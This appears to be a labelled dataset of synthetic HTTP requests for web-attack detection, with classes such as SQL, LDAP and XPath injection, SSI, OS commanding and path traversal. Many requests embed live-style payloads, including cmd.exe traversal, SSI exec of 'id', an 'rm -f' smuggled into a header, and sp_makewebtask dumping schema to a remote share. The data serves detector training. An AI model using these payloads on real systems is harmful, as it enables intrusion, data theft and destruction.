PUT /tdmiAoiunArnR/0lb5sNrdh5etgPvlehaj/8_O.M6t/dhawn2/-6BBl-Gm2cvAUlR/ee9gnexec5dcnrdnvw/1a9j9RdocumentLqt_h/oesis8mHch56nKgsl4gE.js? HTTP/1.0
Content-Length: 66
Content-Language: 2bgdal6h
Content-Encoding: compress
Content-Location: http://www.h0eccmnm.uk/eeaoa5k/iumc7hpr/etnia.cfm
Content-MD5: dGFOZW1yZXNhZWFuYW5QZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Nov 06 11:53:20 UTC
Last-Modified: Tue, 01 Jan 08 03:12:45 UTC
Host: 156.53.215.91:80
Connection: keep-alive
Accept: video/mpeg, text/xml
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, identity, compress;q=0.1
Accept-Language: zntifh-mlerreuu, n-me4e
Cache-Control: max-stale
Client-ip: 102.91.230.177
Cookie: ca1ncoh=5075;rr5hndy=;    exec     get_cust(   'x''  union select     object_name,object_type,''x'' from user_objects    where  ''er''   = '' '  );
Cookie2: $Version="20"
Date: Thu, 06 May 04 15:41:31 UTC
ETag: W/"YaILAANfI.kxan1"
Expect: 100-continue
From: ioaap7@1ooteyes.be
If-Modified-Since: Wed, 08 Sep 04 01:46:56 CET
If-Unmodified-Since: Fri, 24 Dec 04 09:25:42 UTC
If-None-Match: *
If-Range: Mon, 16 Nov 09 23:47:00 CET
Max-Forwards: 95
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM bmV2aWVmQmltdnliRW8wc3Rybnh0YW1pcWhkZ3dtM3Rk
Authorization: ot5d pecn=mannr
Range: 5588-,-1
Referer: http://8tfeooeX.st/siei/oysluodd/Yhetm/evyl.txt
TE: deflate;q=0.6,chunked;q=0.0
User-Agent: rg73Y6i4@ http://www.taeig55z.be
UA-CPU: PowerPC
UA-Disp: 4064,3082,32
UA-OS: Windows NT
UA-Pixels: 464x9183
Via: 0.8 www.oB4nLsr.html, dikwmj/8.7 www.nedoeo.js
Transfer-Encoding: compress
Upgrade: ossI/6.1, yeasi/9.7, Ehhqf/8.1, dni/4.0
Warning: 158 115.67.48.164 "seen" "Thu, 23 Nov 06 08:31:36 UTC"
X-Forwarded-For: 129.199.201.92
X-Serial-Number: 830884
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xsu0ooh9hld=dHWUH7UVTp&2b=aveeed&5jbC7eem=ntev&erzmx=9&cn=37751827

End - Id: 42782
Start - Id: 39972
class: SSI
GET /b126gLKbw1mDJujh/Seesvry2gibrdsatcbi/rJai./zJlv24nph-/8uO/ocIxrVs2CFCKRIv..png?SKbgsound3DVvarkn=awb&fte1sy5aaeS=wRUlnY_r-&seas6vNmnreqm=8536985&rcXld=989550&tluqAodnhwvLsi=t&iwersqazS=sbc&le=t0ir7jnbij&at7tudyjrOdo=7981556&ti=nEviXDZwf.A&risnTnrm=lyefs4urC4&9tinestsn=6%5C&nst5brRoud=%3C%21+%23%3C%21--++%23exec++++cmd%3D%22id%22--%3E&artaasgnma=idihkO8eairpil&jx=y%3Arlesti&3E%uxml@u_ON9=pNX6htFMdZup HTTP/1.0
Host: 187.172.218.203
Connection: nnt9itx
Accept: audio/*;q=0.2, video/*;q=0.6
Accept-Charset: hz-gb-2312;q=0.0, euc-kr;q=0.6, ks_c_5601-1987;q=0.7, iso-8859-1;q=0.7
Accept-Encoding: deflate
Accept-Language: *;q=0.7
Cache-Control: esnlQsy='rmo'
Client-ip: 160.248.173.144
Cookie: xcWst1i=stodo8cd3n(s+2 an&;h5secnuuem=e 5sock_stream@eveuo$;5tooeesi=89;1Ou2NtnrhVm=zae1i4HeeasOso1mS;iulmu1oed=9ca4lobr;g01trhr7giE=aki0h
Cookie2: $Version="03"
Date: Fri, 17 Sep 04 23:20:26 GMT
ETag: W/"AZnigfVHFs0zM56rr"
Expect: a3hy
From: geep3@ewvRfcmr4A.be
If-Modified-Since: Tue, 10 Aug 04 16:33:43 CET
If-Unmodified-Since: Tue, 21 Mar 06 09:50:52 CET
If-Match: "E6MDRd0xiImAW7GkRm"
If-None-Match: "fihmD7MwCqdTUGA"
If-Range: Mon, 06 Apr 09 10:57:50 UTC
Max-Forwards: 40
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Basic UnBpNzpjNG9lZTNoZA==
Range: 75-
Referer: /aSlew/er0mmz/e2rS/itl6.jpg
TE: trailers,chunked;q=0.5
Trailer: Range
User-Agent: Mozilla/9.1 (X11; U; SunOS sun4u 5.8; rn-ny; rv:6.6.9) Gecko/15517868
UA-CPU: Sparc
UA-OS: WinNT
UA-Color: color16
Via: 0.8 133.88.95.175, HTTP/9.1 119.227.213.29:5539, FTP/1.9 50.234.198.92
Transfer-Encoding: compress
Upgrade: eto/0.2, rok/5.4, dgyt4O/7.3, hii8/8.4, hooeh/2.3
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39972
Start - Id: 40614
class: SSI
GET /2g0C0u8q_S0u/whFwHsB/eeKzfhPRuvA/zadxcdei9ammo/ktcFr5nlRLbich6nc0pE/wsnnpuwrfssieleeud6O/ta6s4sedast/lbinW1nbKA.gif?tloea=3242&eV6aj0oankem0c=63206&cvlEdcdLn=n-ld1QGcD2&uNZD2zxjf=u+Uyrostyle&eebeeaeyno=2207&adeshb2oli1ears=8318&kogb0tr1ttdn=iTe+d&e9o8anssrats=yo%28y&vzMVNjo69=%3C%21--+%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E HTTP/1.0
Host: 68.123.229.37
Connection: keep-alive
Accept: audio/basic;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: 5krsc53-c;q=0.4, rehy1ntR-ua, EsTarni-n4st3;q=0.6, e-nmymdoe
Cache-Control: no-cache
Client-ip: 120.210.21.251
Cookie: siSs=sezinhjpdel;wreplaceG-=54890395;Geyd=ly;e3oeO=so 'm6;
Cookie2: $Version="252"
Date: Mon, 08 Jun 09 10:47:33 CET
ETag: W/"XWRHMD7oM416.PP_iF5_"
Expect: 100-continue
From: mObarai@oDeniipebe.it
If-Modified-Since: Wed, 19 Apr 06 04:37:00 CET
If-Unmodified-Since: Wed, 25 Mar 09 10:41:46 CET
If-Match: *
If-None-Match: "2dT5D-vtaabb8Qb@FHrd"
If-Range: Sun, 02 Jul 06 02:41:56 UTC
Max-Forwards: 47
MIME-Version: 5.8
Pragma: EetnnZ2=yex2ognu
Proxy-Authorization: NTLM c29ZbHRmc2poZ3RadG5ocG5jb2Nuc3RpaXJMRW9hdGM=
Authorization: Digest username="ednha"
Range: 81-,-579,-995856
Referer: /n6soebas/wvei/rto8nR.zip
TE: gzip,trailers
Trailer: If-Match
User-Agent: Mozilla/3.1 (Machintosh; U; Mac OS X 1.4; ea-fA; rv:3.6.2) Gecko/49405460
UA-CPU: PowerPC
UA-Disp: 116,2183,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 367x571
Via: 1.0 85.89.217.221, hJ9/1.9 94.217.135.142, 7Spp/8.8 www.oAne.css
Transfer-Encoding: asea
Upgrade: aen/7.4, rd7in/6.7
Warning: 304 www.eueCo.tiff:16 "IcolrcmeCtIstSoht5ne" "Sat, 07 Jul 07 14:18:42 CET"
X-Forwarded-For: 5.3.246.86
X-Serial-Number: 0848613920149750
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40614
Start - Id: 46084
class: PathTransversal
PUT /kWwinntCWh0J.css? HTTP/1.0
Content-Length: 330
Content-Language: hi
Content-Encoding: deflate
Content-Location: http://ecgvc.net/6ngsl5/srwlctid/nsokoO/rrqlytcq.php3
Content-MD5: dHB0QWNPbmVxaTJFYU1yZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Jan 07 05:24:38 GMT
Last-Modified: Sun, 30 Aug 09 23:30:36 UTC
Host: 37.30.216.156
Connection: close
Accept: */*;q=0.1
Accept-Charset: utf-8;q=0.5, iso-10646-ucs-2;q=0.5, euc-cn
Accept-Encoding: compress, identity, deflate;q=0.6, identity, identity;q=0.1
Accept-Language: anm30o-he
Cache-Control: max-stale
Client-ip: 241.160.161.88
Cookie: oesi=qI;nn=child;auhnsu=ftp\ioa8reycmPm%sdt[m@;ssib4soa=aq4t
Cookie2: $Version="7"
Date: Fri, 05 Mar 10 21:29:22 GMT
ETag: "i50HC.gUjdyosoH"
Expect: easElso=8jRolIq
If-Modified-Since: Wed, 13 Jun 07 03:37:29 CET
If-Unmodified-Since: Sun, 18 Dec 05 04:05:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 77
MIME-Version: 4.9
Pragma: kkpn=xniErhr
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: Digest username="teawnat"
Referer: /soklil8/hanae/lcapoue/srnaam.wav
TE: chunked;q=0.0,gzip,deflate;q=0.9
User-Agent: Mozilla/4.1 (compatible; MSIE 6.8; Solaris; hbXaAned; eanetha7t9; drkfsc7)
UA-CPU: x86
UA-Color: color32
UA-Pixels: 1090x096
Via: FTP/2.2 149.96.97.72, 3.0 www.wyred.jpg, 9tg/4.6 www.neharoo.html
Transfer-Encoding: compress
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 3193493640489
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rfteDeteezi0=8h enmochabii)where/nmr&rexecFL3cyn9=ooapeomgdmhxrn&6trq=c33es&eis2tineeTnu=akstdinens&0snnetoyoeil5oa=a:/.htaccess~&8h=vnisd&sTnjesce8rae=bortsszymhjq6Ehha&utxtio=lsumahetr31nmrt&yEuAttsitl7n3T=4321617&eYeyoe3fw=u7&riattIFtS0m=wuzedh&96aqeewe1y7o=822826327&bodyPxMinrV=ePkJY36v&erTNaTsuR=rtct3&Q@ZMcANG1G=0

End - Id: 46084
Start - Id: 49142
class: XPathInjection
GET /sYA@8ytu303/5B.jpeg?aHSboot.ini39connectJZ_o2=67&stdinBmailJDFSJ9form=7Enr9eS&srotAn2vrgtmes=toyoo+n&aperaphtisnnie=%3FteereYrkt7&ep=74071010&TtgeefM3syo=iarv%27++++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28++++i%2B+j++%2B+k++++%2B+l++%2B++1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++++%27od%27++%3D++++%27+++caDoa0oN%27+or&t3r0gsmA=amijn5tdo9e%26httpssrc&3v121jdYN7Wf=e.9_3&ntm4t=553147050&wn=n0ye&imat0=z+ac&se=optT&vSr7ximhcaro=%27rw HTTP/1.0
Host: www.tTqxiueea6.com
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: us-ascii;q=0.0, iso-8859-15;q=0.9, iso-8859-2, big5
Accept-Encoding: identity, deflate;q=0.5, identity, compress, identity
Accept-Language: *
Cache-Control: min-fresh=992
Client-ip: 97.222.173.73
Cookie: esedaRrGsrLeT=leee7|hrrc;40i=n;mltyFusraiscript9i
Cookie2: $Version="36"
Date: Wed, 19 Aug 09 07:16:40 GMT
ETag: "GgpzpScDa_69HXc"
Expect: 100-continue
From: hstr@4dfys6.de
If-Modified-Since: Sat, 11 Jul 09 20:32:26 UTC
If-Unmodified-Since: Tue, 15 Jan 08 11:37:13 GMT
If-Match: "1NJ1GOIPBSxqN-Ou"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 5.4
Pragma: feeOe='azeuicJ'
Proxy-Authorization: NTLM aXBhOWVraXQxZXJkckVhZXgwVE5hQXhwc3RzbHJ0b2VsZnN0b25jZWFv
Authorization: Digest cnonce="eoetai"
Range: 4916-
Referer: http://TaDm4ros.com/to4E/nsLessli/01omhrss/zietrs.wmn
TE: trailers,trailers
Trailer: Host
User-Agent: rqoaaBlgth (qwK2hnY; 9LMLFepzn)
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 793x723
Via: 5.3 www.Ryeahcn.gif
Transfer-Encoding: sois
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 384 www.rticla.shtml:33631 "lrerokniaeoes" "Wed, 18 Jan 06 05:57:49 CET"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49142
Start - Id: 36677
class: OsCommanding
GET /Ihn/e@TeXOyCsF4/Y3/nkeks2DP/ec4QYxOeel_/rGj7nIiNHbjHgzt/i3n2tchrierh0tyfhe1s/6TNqwXHX13K_0.mm/088DgT1group byb/EceelcaqoFeds7g/cne2aoIatiah/i5IiAYT1hhNk-a5Sy.png?eimnns=p HTTP/1.1
Host: 60.81.40.226:80
Connection: close
Accept: audio/x-wav
Accept-Charset: *
Accept-Language: rm  -f  /tmp/orl   |
Cache-Control: no-store
Date: Sun, 19 Sep 04 21:29:18 CET
If-Unmodified-Since: Sun, 07 Mar 10 24:42:54 CET
Pragma: no-cache
Referer: http://B8lr.fr/tFuraUki/0Csea/ehe6/rskee.php3
User-Agent: Mozilla/4.2 (Machintosh; U; PPC 3.0; 0B-rn; rv:9.2.0) Gecko/96646458
Transfer-Encoding: identity

null

End - Id: 36677
Start - Id: 44895
class: PathTransversal
GET /rd4gaB8ertactou/d_F.cgi?cth9ftsn=1ya&6d=i%2F6u%28&aE1ab1c=zNln8oWtGP&fdsson=ebojQ0TGDSS&stcvjtnyruouh=.%2F..%2F..%2F..%2F..%2F..%2F&EuQMaUt=%3Dhtpassiab&fbtrh0hny9=stDnoot HTTP/1.1
Host: 129.73.209.215:80
Connection: keep-alive
Accept: audio/x-wav, audio/basic, application/*;q=0.8
Accept-Charset: euc-tw;q=0.0, windows-1253;q=0.3, macintosh
Accept-Encoding: compress;q=0.1, gzip;q=0.2
Accept-Language: e2atko-iWou;q=0.2, lmtLuea-at3;q=0.6, tshrea-ee0aeed, w-O;q=0.7, sl-Uttu9;q=0.3
Cache-Control: max-stale
Client-ip: 139.102.255.156
Cookie: aeeytni3ciUrae=bUaeEilxsteheei
Cookie2: $Version="65"
Date: Wed, 13 Jul 05 15:47:15 GMT
ETag: W/"tIHhbmSuiGV1mULHe7Fs"
Expect: eaqhh8
From: h1ron2@ytje.com
If-Modified-Since: Tue, 13 May 08 08:39:40 CET
If-Unmodified-Since: Fri, 16 Oct 09 16:50:37 GMT
If-Match: *
If-None-Match: "U8pArl3Dh-qGpG8b5-U"
If-Range: *
Max-Forwards: 8
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: NTLM ZG93bmRvZXJzaWN0ZUx0ZVRlMGtvZUw1cmFzZWVmcHQ4SDcw
Range: -129
Referer: /lrtw/SteEsmj/tgagpwed.js
TE: trailers,chunked
Trailer: Accept-Charset
User-Agent: 3bh4si (hFo5GIsw5)
UA-CPU: x86
UA-Disp: 7572,678,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6797x3315
Via: 6.4 7.196.163.211:707, HTTP/1.3 156.156.254.180
Transfer-Encoding: identity
Upgrade: yr2s/6.7
Warning: 118 www.ioLnarno.css "eelowsyOstqsreyn6" "Tue, 10 Oct 06 11:17:40 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44895
Start - Id: 35058
class: SqlInjection
GET /nWRmy/sRoIn5MWoCi6YN/xehHebietg/qavhktwTeBs8bunufh/deevsilletDeis/yerdey6cMnnasgwEe/emphnotaTnmjteh/p9rt/lsa/L6RitZaee0lgp/elBi/pvT0byulb.gif?hseeh1aAY=363&iHaUlagn4rtte=ke&cuFE-andY4=childe&7NXQw=%27%3B+EXEC++++master..sp_makewebtask++%22%5C%5C21.206.228.220%5Cheaetwti%5CkU4tm58l.html%22%2C+%22SELECT++*+FROM+++INFORMATION_SCHEMA.TABLES%22&Asodd=y&ceafce=twNk3 HTTP/1.1
Host: 132.222.12.172
Connection: icndcaf0
Accept: */*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 243.80.185.17
Cookie: uetxsnt=8MY
Cookie2: $Version="16"
Date: Sat, 29 May 04 13:19:00 GMT
ETag: "WafdUY6zudi3PdKk7Olr"
Expect: 4en1t=spype;iksuo0L=mtJuin
If-Modified-Since: Fri, 19 Jun 09 09:30:24 GMT
If-Unmodified-Since: Tue, 04 Sep 07 22:08:46 CET
If-Match: "9.9F5a9MwmVClUI"
If-None-Match: "Dq4a30R8SBQMWsUr"
If-Range: Thu, 16 Nov 06 05:57:12 UTC
Max-Forwards: 697
MIME-Version: 0.3
Pragma: xiaiiz6=ttr02u
Proxy-Authorization: Basic aFJpQzpidHN1bw==
Authorization: Digest response="3dEc697Add0CaAA0B0C374BbBD4da0e2"
Range: -4,7-,2698-
Referer: /der6uL/ittiy/ebcthue/eRoltawk/t1k5Y.aspx
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: r@xi0pn4s http://www.munp.net
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 989x6143
Via: HTTP/2.6 www.lbtfe.js:08
Transfer-Encoding: deflate
Upgrade: l5i/1.7, lDqw/9.3, ade/1.3, rst/9.9
Warning: 825 www.eezs.png:4813 "dnlyiz8ddawi9eucren" 
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35058
Start - Id: 44210
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.urotrhh.de:41
Connection: keep-alive
Accept: application/*;q=0.7, application/postscript
Accept-Charset: x-mac-roman;q=0.4, iso-8859-5;q=0.4, iso-10646-ucs-2;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: o-l;q=0.8, weatre-yowsrdI;q=0.8, ue-sdesoa1l, mph-3sre
Cache-Control: min-fresh=668
Client-ip: 99.103.6.37
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="370"
Date: Tue, 27 Sep 05 21:56:23 CET
ETag: "KxyMqNAT9Wpl8gi0Q"
Expect: 100-continue
From: rOaz@gEadsxsee.biz
If-Modified-Since: Thu, 30 Nov 06 18:21:58 UTC
If-Unmodified-Since: Sat, 22 Mar 08 02:52:10 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 04 May 06 08:33:18 CET
Max-Forwards: 7
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: Digest realm
Range: 09660-850419
Referer: /1gnl.jpg
TE: gzip,trailers,chunked;q=0.6
Trailer: User-Agent
User-Agent: devo/6.6
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 953x6132
Via: HTTP/7.4 183.247.230.93, HTTP/9.7 213.76.252.111:81687
Transfer-Encoding: compress
Upgrade: eEEr/2.5, y9ejm/8.5, Nwaeld/9.4, tc4/7.0
Warning: 500 167.56.88.243 "a4steEosrC3cbant" "Thu, 15 Jul 04 08:17:33 UTC"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44210
Start - Id: 37906
class: LdapInjection
GET /o266oE/ixjWXmn8_/OlrnodeYT9QaZ/cemrg/R7rMe/yad/bwZVih@6PbhjD7wxmFH/w8w-f/t8Oy0/ar6.aspx?h3I7iexaTtg3ao=8&iain8aTBrfbqaln=pa1&2h2dztirpmasod=2iRtirnct%40h&2z9eeuzysuib6u=7uhne&eathtantrUlus=ilr3mP4_&oeobt=ri&lt7evesa6exm=acbueval&Eas=wsuephnhDeoc%28o&Msy_3Fasve4=+%3Eom&zscriptrcpB=ys0%29%28%7C+++%28ql%3D*%29&wsetrauiiaiamc=129056&Em5LQ9nFPT9=Rd80oh&0yuieylla=8rfdysoOkdyh HTTP/1.0
Host: 229.134.107.80:5932
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: identity;q=0.3
Accept-Language: inten-hq, smtn-deRasmex;q=0.5, i-ooe1, cmmo-ys;q=0.5, leoaI-ar
Cache-Control: only-if-cached
Client-ip: 206.217.112.201
Cookie: hgshsahfb9dw=ihReti5tsvzjpgb;3proiece=ouUr0@1wtqw;pefisneikeer=dl2as Spar0extmp
Cookie2: $Version="005"
Date: Sun, 10 Jun 07 15:28:10 CET
ETag: "JZhlDTWGKEbF0bqOW33"
Expect: 100-continue
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Mon, 01 Jun 09 03:38:39 CET
If-Unmodified-Since: Mon, 25 Sep 06 11:39:32 GMT
If-Match: *
If-None-Match: "KPyQYS3ZDOJzjYnPKR"
If-Range: Wed, 28 Feb 07 05:55:11 CET
Max-Forwards: 44
MIME-Version: 1.5
Pragma: 0KeaihmT='t9aart'
Proxy-Authorization: NTLM MGVydXNoYWU0VVRubjF6ZWZtcmV2b3ZkZWx1aVBuZ3RvRXJhY29ybmRo
Authorization: Basic bnJXZXNnOjk5cDlzbDZk
Range: -004662,03-,-2001
Referer: http://www.Doech.be/desre/rRtssu/lehg/pyos/lrmstn.mdb
TE: gzip
Trailer: User-Agent
User-Agent: Mozilla/6.8 (compatible; MSIE 2.0; Linux i586; dqf5po; Ortktiaint; Tnoin)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 649x451
Via: 6.5 www.ctxn.png
Transfer-Encoding: gzip
Upgrade: 1tena/5.3
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 17792276895005878262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37906
Start - Id: 38941
class: LdapInjection
GET /etbH6cikjeeurfe/Ce9hkcgdThskdtnhliaz/oaiseepf/esor0aEPLoG/ax00dc0/c0.YX75style_6_/o6sffamm18xlz/sV1RGg@ZL@AyqCJsN/aAisNoEaso/IXMh7OP7wbnP.mdb?QFOENHM=n+sor&metsosnhsuHoc=mFs&czwsoseaaeroaO=1109&a8i2eaoehs=to2ojxtermeckeaktG&nEyti5i=eei%29%28++%7C+++%283r%3D*%29&8streEwenassR=12&gZv6E=7&1eea13s=2&orenou=3&sLUeediid2skex=ra5nautrhe&pt1tsanseoxar=28981&eia4rn=dO&lSanP4sn=ese5sf4ucurniul HTTP/1.1
Host: www.kieutEyi0.be
Connection: close
Accept: video/*, text/html;q=0.5, audio/x-wav
Accept-Charset: x-mac-greek, windows-1257, x-mac-japanese, windows-1257, iso-8859-3;q=0.9
Accept-Encoding: identity;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 53.164.177.129
Cookie: te=h_Et4Q5bLt3;sfet=ohps7r/eexec;bhsne=49303
Cookie2: $Version="7"
Date: Sun, 25 Jul 04 14:27:44 UTC
ETag: W/"ZzhSlCITX6NTS9bN"
Expect: LdFns
From: merdf@ssdhtag.cz
If-Modified-Since: Sun, 29 Oct 06 10:48:39 GMT
If-Unmodified-Since: Mon, 18 Jul 05 19:19:19 GMT
If-Match: "_e84BLlSNEdGvmCB"
If-None-Match: "29m2zwY4wYt.xx5ccO5"
If-Range: *
Max-Forwards: 65
MIME-Version: 8.7
Pragma: 1ymeE3bt=bngaA
Proxy-Authorization: NTLM NGloNUVlOER0YWFvb2dlMHRBZnZuR3RlczZodDJkaWVoc0Ruc2I=
Authorization: Basic dG9lcEZxOndjYjR3UlJh
Range: 19115-,-68,486-99
Referer: /msdy/thgsz.shtml
TE: chunked,chunked
Trailer: From
User-Agent: Mozilla/1.0 (compatible; Konqueror/7.9; Unix; bSeeazlr7; entowf)
UA-CPU: 68000
UA-Disp: 8172,5109,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 0621x5666
Via: 0.8 89.150.107.5:36670
Transfer-Encoding: treihe; ttti0=ddIrm
Upgrade: shejr/6.7, moOdhj/9.9, yir/7.8
Warning: 059 110.126.4.121 "ei72xe" 
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38941
Start - Id: 49326
class: XPathInjection
GET /cna/dbtegr/rz1Se/zDrm.exe?cSiyoh=%7Cv&aloshefed=kg75UnStauiad1t&MdpassthruJE8BIya=ru8H-&loEdsc=dsd1%28aeoz%3E0h%5BUbpositionopen&8omxrOoyse=dwp-%3Dadminin&focqeMratsm=unek%3AT&tDyd=rvsvarerm3%24f+azgf+k&-ArmN0=58665+++or++++1%3C++lsi%2Frbroe%2Fk%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D9%5D+++or+0%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&Hk=rlLe8ma94+&kuieeezdto=asE2CpMFL&ptie=4309389 HTTP/1.0
Host: www.s2eots5h.st:4
Connection: keep-alive
Accept: image/png;q=0.1, video/*, text/xml
Accept-Charset: iso-10646-ucs-2;q=0.0
Accept-Encoding: compress, deflate;q=0.5, deflate, identity, compress
Accept-Language: 3i-olspriu, newroi-V;q=0.3, aEqh-t;q=0.2
Cache-Control: max-age=66551
Client-ip: 23.87.77.7
Cookie: baeohBtFshlet1=76246;twhdoniH=e0cqdAxan(1esock_stream3;ed=nts7;faZTmR=44686;me5Tti=ecao;7jre=hr'
Cookie2: $Version="864"
Date: Thu, 09 Mar 06 18:16:40 GMT
ETag: "4pVBt53WDInwfVKUJju"
Expect: 100-continue
From: 5sny@toesr.uk
If-Modified-Since: Mon, 08 Sep 08 24:30:08 GMT
If-Unmodified-Since: Sun, 11 Feb 07 13:54:07 CET
If-Match: "gyKNbR_I5KPfq01"
If-None-Match: *
If-Range: Thu, 23 Oct 08 07:28:24 UTC
Max-Forwards: 9
MIME-Version: 6.3
Pragma: ee5rhcb='se'
Proxy-Authorization: Digest response="d0ae87B45D5a7ceD8A37AdE3bc88eEd6"
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: /rsea/letii/5ioen/aawn/8hiT.swf
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: iB6uG1 http://www.ieadHqs.net
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: 4.5 www.emhukO.tiff, FTP/7.8 www.ansa.tiff
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 462 247.12.174.34 "laiyomneitoohpnNd1mn" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 09521
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49326
Start - Id: 43924
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.uocnc.cz:80
Connection: close
Accept: audio/basic;q=0.3
Accept-Charset: euc-cn, iso-8859-4, isiri-3342, iso-8859-8;q=0.0
Accept-Encoding: gzip;q=0.0, compress, compress;q=0.1
Accept-Language: gn0h-aasndt5;q=0.4, bhhs-el3;q=0.2, euuz-hoh
Cache-Control: max-age=5847
Client-ip: 22.30.133.135
Cookie: ti8oldhg=ndq;oet0=6767318;mdgtpsu9=ongriGolibqis8ee
Cookie2: $Version="50"
Date: Sun, 24 May 09 22:01:49 GMT
ETag: W/"vie1Rh-65y4FyKK@u97g"
Expect: E1rm8N
From: 1kgppr4t@scvneraV.de
If-Modified-Since: Sat, 19 Feb 05 05:22:48 UTC
If-Unmodified-Since: Tue, 02 Jan 07 20:21:25 UTC
If-Match: "Hpz7QkwsSHPIH8@F"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 9.1
Pragma: nepwates=tdpISl4y
Proxy-Authorization: 11s3 o9eO=rsleec
Authorization: Basic ZWFmNTpsdHQ5Ug==
Range: 6652-,-36477,66590-93
Referer: http://www.xo6eT.cz/fyeD/usen.asp
TE: gzip;q=0.5
Trailer: Accept-Charset
User-Agent: rguh9a (kjNVGgFV6; gFfs18xQ; lYM@ILrVX; e1C3ekSmA; ompp15k)
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 428x0275
Via: Clns0/8.4 167.145.164.92, 0.6 195.124.215.252, het/7.8 157.222.240.241
Transfer-Encoding: gzip
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 684 71.187.135.86:599 "7Aoc3tmse" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43924
Start - Id: 38405
class: LdapInjection
GET /n.wOU2fqfHgv6x4V3mtl.pl?tneetam4rf9C=ibusd6&hngqA4pnsSBi=269&ecDoothh=%29%28+++%7C++%28displayName%3Dhad*%29++%28name+%3D+++had*++++%29%28++++mail%3Dhad*%29&t0dlijhuoPs=5919604 HTTP/1.0
Host: www.ueyao.fr
Connection: keep-alive
